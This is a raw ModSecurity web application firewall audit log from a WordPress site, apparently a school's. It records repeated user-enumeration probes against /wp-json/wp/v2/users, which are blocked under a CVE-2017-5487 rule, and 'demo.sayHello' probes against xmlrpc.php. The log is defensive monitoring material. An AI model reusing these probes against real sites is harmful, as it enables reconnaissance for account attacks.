Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --37c9e278-Z-- --1732850a-A-- [17/May/2025:07:05:43 +0700] aCfS13yxdQCiyU1ENFcmgQAAAAg 103.236.140.4 42382 103.236.140.4 8181 --1732850a-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.253.165.118 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.253.165.118 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --1732850a-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --1732850a-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747440343740919 2806 (- - -) Stopwatch2: 1747440343740919 2806; combined=1258, p1=441, p2=785, p3=0, p4=0, p5=31, sr=74, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --1732850a-Z-- --1f15a040-A-- [17/May/2025:07:05:49 +0700] aCfS3XyxdQCiyU1ENFcmgwAAAAs 103.236.140.4 42386 103.236.140.4 8181 --1f15a040-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.253.165.118 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.253.165.118 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --1f15a040-C-- demo.sayHello --1f15a040-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --1f15a040-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747440349990763 4426 (- - -) Stopwatch2: 1747440349990763 4426; combined=3337, p1=406, p2=2753, p3=19, p4=19, p5=81, sr=66, sw=59, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --1f15a040-Z-- --9d7d453d-A-- [17/May/2025:07:05:54 +0700] aCfS4um4kjNN-hEbWjJAkwAAAEI 103.236.140.4 42390 103.236.140.4 8181 --9d7d453d-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.233.75.9 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.233.75.9 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --9d7d453d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --9d7d453d-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747440354912384 2540 (- - -) Stopwatch2: 1747440354912384 2540; combined=1142, p1=391, p2=721, p3=0, p4=0, p5=29, sr=73, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --9d7d453d-Z-- --7d3d3616-A-- [17/May/2025:07:06:00 +0700] aCfS6HyxdQCiyU1ENFcmhgAAABE 103.236.140.4 42394 103.236.140.4 8181 --7d3d3616-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.233.75.9 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.233.75.9 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --7d3d3616-C-- demo.sayHello --7d3d3616-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --7d3d3616-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747440360933084 4811 (- - -) Stopwatch2: 1747440360933084 4811; combined=3458, p1=470, p2=2810, p3=27, p4=30, p5=72, sr=62, sw=49, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --7d3d3616-Z-- --a6e7b616-A-- [17/May/2025:07:06:51 +0700] aCfTG3yxdQCiyU1ENFcmiAAAABI 103.236.140.4 42398 103.236.140.4 8181 --a6e7b616-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 154.213.163.240 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.213.163.240 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --a6e7b616-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --a6e7b616-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747440411397777 2867 (- - -) Stopwatch2: 1747440411397777 2867; combined=1266, p1=458, p2=777, p3=0, p4=0, p5=31, sr=78, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --a6e7b616-Z-- --7c730b1f-A-- [17/May/2025:07:06:57 +0700] aCfTIXyxdQCiyU1ENFcmigAAABQ 103.236.140.4 42402 103.236.140.4 8181 --7c730b1f-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 154.213.163.240 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.213.163.240 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --7c730b1f-C-- demo.sayHello --7c730b1f-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --7c730b1f-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747440417743613 6388 (- - -) Stopwatch2: 1747440417743613 6388; combined=4592, p1=608, p2=3746, p3=39, p4=43, p5=94, sr=78, sw=62, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --7c730b1f-Z-- --9d5d957b-A-- [17/May/2025:07:07:27 +0700] aCfTP3yxdQCiyU1ENFcmjAAAABg 103.236.140.4 42406 103.236.140.4 8181 --9d5d957b-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.253.176.220 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.253.176.220 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --9d5d957b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --9d5d957b-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747440447005638 3549 (- - -) Stopwatch2: 1747440447005638 3549; combined=1511, p1=532, p2=942, p3=0, p4=0, p5=37, sr=89, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --9d5d957b-Z-- --da11274d-A-- [17/May/2025:07:07:31 +0700] aCfTQ3yxdQCiyU1ENFcmjgAAABc 103.236.140.4 42410 103.236.140.4 8181 --da11274d-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.253.176.220 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.253.176.220 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --da11274d-C-- demo.sayHello --da11274d-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --da11274d-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747440451567105 5547 (- - -) Stopwatch2: 1747440451567105 5547; combined=4067, p1=538, p2=3304, p3=31, p4=35, p5=95, sr=73, sw=64, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --da11274d-Z-- --215fb528-A-- [17/May/2025:07:13:47 +0700] aCfUu-m4kjNN-hEbWjJAmgAAAE4 103.236.140.4 42448 103.236.140.4 8181 --215fb528-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.249.57.123 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.249.57.123 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --215fb528-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --215fb528-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747440827686797 3154 (- - -) Stopwatch2: 1747440827686797 3154; combined=1360, p1=513, p2=817, p3=0, p4=0, p5=30, sr=142, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --215fb528-Z-- --c677ca18-A-- [17/May/2025:07:13:54 +0700] aCfUwum4kjNN-hEbWjJAnQAAAFI 103.236.140.4 42454 103.236.140.4 8181 --c677ca18-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.249.57.123 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.249.57.123 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --c677ca18-C-- demo.sayHello --c677ca18-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --c677ca18-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747440834784480 4751 (- - -) Stopwatch2: 1747440834784480 4751; combined=3737, p1=455, p2=3078, p3=28, p4=25, p5=89, sr=65, sw=62, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --c677ca18-Z-- --ee422524-A-- [17/May/2025:07:14:17 +0700] aCfU2XyxdQCiyU1ENFcmlgAAABE 103.236.140.4 42474 103.236.140.4 8181 --ee422524-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.242.45.252 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.242.45.252 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --ee422524-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --ee422524-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747440857715065 2579 (- - -) Stopwatch2: 1747440857715065 2579; combined=1235, p1=440, p2=765, p3=0, p4=0, p5=30, sr=77, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --ee422524-Z-- --13352d32-A-- [17/May/2025:07:14:21 +0700] aCfU3em4kjNN-hEbWjJAogAAAEI 103.236.140.4 42478 103.236.140.4 8181 --13352d32-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.242.38.50 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.242.38.50 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --13352d32-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --13352d32-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747440861417286 2847 (- - -) Stopwatch2: 1747440861417286 2847; combined=1237, p1=429, p2=778, p3=0, p4=0, p5=29, sr=79, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --13352d32-Z-- --81c1403f-A-- [17/May/2025:07:14:27 +0700] aCfU43yxdQCiyU1ENFcmmQAAABY 103.236.140.4 42484 103.236.140.4 8181 --81c1403f-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.242.45.252 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.242.45.252 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --81c1403f-C-- demo.sayHello --81c1403f-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --81c1403f-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747440867050546 6426 (- - -) Stopwatch2: 1747440867050546 6426; combined=4687, p1=627, p2=3876, p3=32, p4=36, p5=70, sr=81, sw=46, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --81c1403f-Z-- --258a4a6f-A-- [17/May/2025:07:14:27 +0700] aCfU43yxdQCiyU1ENFcmmgAAABg 103.236.140.4 42486 103.236.140.4 8181 --258a4a6f-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.242.38.50 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.242.38.50 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --258a4a6f-C-- demo.sayHello --258a4a6f-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --258a4a6f-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747440867744709 4974 (- - -) Stopwatch2: 1747440867744709 4974; combined=3715, p1=470, p2=3039, p3=26, p4=25, p5=90, sr=83, sw=65, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --258a4a6f-Z-- --debfa245-A-- [17/May/2025:07:14:32 +0700] aCfU6HyxdQCiyU1ENFcmnQAAAAM 103.236.140.4 42492 103.236.140.4 8181 --debfa245-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 154.213.194.111 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.213.194.111 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --debfa245-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --debfa245-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747440872637057 1953 (- - -) Stopwatch2: 1747440872637057 1953; combined=985, p1=337, p2=622, p3=0, p4=0, p5=26, sr=84, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --debfa245-Z-- --f1c27b09-A-- [17/May/2025:07:14:40 +0700] aCfU8Om4kjNN-hEbWjJAowAAAEM 103.236.140.4 42496 103.236.140.4 8181 --f1c27b09-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 154.213.194.111 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.213.194.111 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --f1c27b09-C-- demo.sayHello --f1c27b09-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --f1c27b09-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747440880040536 6087 (- - -) Stopwatch2: 1747440880040536 6087; combined=4374, p1=540, p2=3499, p3=32, p4=34, p5=149, sr=77, sw=120, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --f1c27b09-Z-- --4229c135-A-- [17/May/2025:07:14:59 +0700] aCfVA3yxdQCiyU1ENFcmoAAAAAg 103.236.140.4 42500 103.236.140.4 8181 --4229c135-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.242.41.201 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.242.41.201 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --4229c135-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --4229c135-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) 